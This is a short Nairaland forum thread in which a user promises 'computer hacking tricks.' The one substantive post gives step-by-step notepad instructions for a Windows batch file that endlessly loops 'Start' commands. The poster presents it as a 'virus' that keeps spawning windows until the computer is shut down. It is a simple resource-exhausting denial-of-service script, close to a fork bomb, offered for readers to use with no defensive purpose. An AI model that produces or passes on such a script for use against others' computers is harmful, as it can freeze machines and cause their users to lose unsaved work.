Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,153,015 members, 7,817,993 topics. Date: Sunday, 05 May 2024 at 02:36 AM

Learn A Lot Of Computer Hacking Tricks With Talasboy - Computers - Nairaland

Nairaland Forum / Science/Technology / Computers / Learn A Lot Of Computer Hacking Tricks With Talasboy (1180 Views)

What Aspect Of Computer/ict Should I Learn As A Non-computer Student / Sales Of Computer As Grade One Scrap / Please,what Is The Role Of Computer Administrator? (2) (3) (4)

(1) (Reply)

Learn A Lot Of Computer Hacking Tricks With Talasboy by TALASBOY(m): 10:06pm On Mar 22, 2017
Hello nairalanders. Today is Muhammad talasboy bachaka want be with you friends. For sharing important educational issues.
Re: Learn A Lot Of Computer Hacking Tricks With Talasboy by TALASBOY(m): 7:47am On Mar 23, 2017
Simple way to write simple various :
By using notepad.
Click on start menu
Goto all programs
Click accessories
Move to notepad
write the following
@echo off
:a
Start
Start
Goto a
And save file extension.bat
Notice the computer will open this virus more times and it will be off if u shutdown ur pc

(1) (Reply)

HP Keypad Locked / I Need Laptop Of 60k To 65k / Need 500GB Hard Disk For My Mini Laptop

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 5
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.